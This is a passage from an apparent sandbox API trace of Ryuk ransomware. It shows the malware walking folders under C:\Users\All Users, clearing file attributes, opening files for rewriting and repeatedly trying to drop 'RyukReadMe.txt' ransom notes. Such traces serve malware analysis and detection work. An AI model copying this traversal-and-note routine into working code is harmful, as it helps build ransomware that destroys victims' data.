dwFileAttributes=0x80) returned 0 [0159.630] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.630] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.630] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.630] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.630] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.630] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp", dwFileAttributes=0x80) returned 0 [0159.631] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.631] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.631] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.631] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.631] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.631] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp", dwFileAttributes=0x80) returned 0 [0159.631] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.631] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.631] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.632] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.632] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.632] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp", dwFileAttributes=0x80) returned 0 [0159.632] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.632] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.632] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.632] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.632] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.632] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp", dwFileAttributes=0x80) returned 0 [0159.632] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.633] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.633] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.633] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.633] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.633] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp", dwFileAttributes=0x80) returned 0 [0159.633] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.633] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.633] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.633] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.633] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.634] SetLastError (dwErrCode=0x0) [0159.634] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.637] GetLastError () returned 0x5 [0159.637] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.637] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.637] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.637] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.637] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp", dwFileAttributes=0x80) returned 0 [0159.637] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.637] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.637] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.637] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.637] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.638] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.638] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp", dwFileAttributes=0x80) returned 0 [0159.638] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.638] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.638] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.638] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.638] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.638] SetLastError (dwErrCode=0x0) [0159.638] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.638] GetLastError () returned 0x5 [0159.638] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.638] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.638] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.639] SetLastError (dwErrCode=0x0) [0159.639] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.639] GetLastError () returned 0x5 [0159.639] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.639] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.639] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Vault\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.639] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.639] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.639] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.639] SetLastError (dwErrCode=0x0) [0159.639] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Vault\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\vault\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.639] GetLastError () returned 0x5 [0159.639] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.639] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.639] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.639] SetLastError (dwErrCode=0x0) [0159.639] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.640] GetLastError () returned 0x5 [0159.640] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.640] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.640] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\VISIO\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.640] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.640] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.640] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.640] SetLastError (dwErrCode=0x0) [0159.640] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\VISIO\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\visio\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.640] GetLastError () returned 0x5 [0159.640] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.640] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.640] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.640] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.640] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.640] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.640] SetLastError (dwErrCode=0x0) [0159.640] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.640] GetLastError () returned 0x5 [0159.640] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.641] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.641] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.641] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.641] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.641] SetLastError (dwErrCode=0x0) [0159.641] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.641] GetLastError () returned 0x5 [0159.641] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.642] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.642] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.642] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.642] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.642] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.642] SetLastError (dwErrCode=0x0) [0159.642] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\profiles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.642] GetLastError () returned 0x5 [0159.642] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.642] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.642] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.642] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.642] SetLastError (dwErrCode=0x0) [0159.642] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WwanSvc\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.642] GetLastError () returned 0x5 [0159.642] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.642] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.642] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0159.642] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0159.643] SetLastError (dwErrCode=0x0) [0159.643] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.643] GetLastError () returned 0x5 [0159.643] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0159.643] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.643] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0159.643] SetLastError (dwErrCode=0x0) [0159.643] CreateFileW (lpFileName="C:\\Users\\All Users\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0159.643] GetLastError () returned 0xb7 [0159.643] CloseHandle (hObject=0x184) returned 1 [0159.643] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft Help\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0159.644] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.644] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.644] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.644] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Hx.hxn", dwFileAttributes=0x80) returned 0 [0159.644] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Hx.hxn" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.645] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.645] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.645] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.645] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.645] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.645] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.645] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.645] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.645] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.645] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.646] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.646] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.646] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.646] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.646] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.646] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.646] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.646] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.646] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.646] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.646] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.646] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.647] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.647] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.647] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.647] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.647] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.647] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.647] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.647] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.647] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.648] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.648] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.648] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.648] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.648] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.648] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.648] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.648] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.648] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.648] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", dwFileAttributes=0x80) returned 0 [0159.649] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.649] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.649] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.649] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.649] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.649] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", 